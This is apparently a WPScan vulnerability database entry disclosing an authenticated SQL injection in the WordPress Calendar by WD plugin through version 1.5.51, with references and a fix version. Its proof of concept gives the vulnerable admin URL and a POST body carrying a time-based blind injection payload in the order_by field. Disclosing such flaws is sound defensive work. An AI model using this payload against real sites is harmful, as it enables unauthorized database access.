Calendar by WD <= 1.5.51 - Authenticated SQL injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
http://www.defensecode.com/advisories/DC-2017-01-017_WordPress_Spider_Event_Calendar_Plugin_Advisory.pdf
Proof of Concept
Vulnerable POST URL:
http://www.vulnerablesite.com/wpadmin/admin.php?page=SpiderCalendar&task=show_manage_event&calendar_id=1

Vulnerable POST Body:
search_events_by_title=a&startdate=2011-11-11&enddate=2017-11-
11&page_number=1&serch_or_not=search&id_for_playlist=&asc_or_desc=&order_by=date AND (SELECT * FROM (SELECT(SLEEP(5)))x)

Affects Plugin

fixed in version 1.5.52

References

URL http://www.defensecode.com/advisories/DC-2017-01-017_WordPress_Spider_Event_Calendar_Plugin_Advisory.pdf
URL https://plugins.trac.wordpress.org/changeset/1632229/spider-event-calendar

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Neven Biruski
Submitter Website http://www.defensecode.com
Submitter Twitter https://twitter.com/DefenseCode/
Views 148
Verified Yes
WPVDB ID 8805

Timeline

Publicly Published 2017-05-02 (6 months ago)
Added 2017-05-05 (6 months ago)
Last Updated 2017-05-05 (6 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.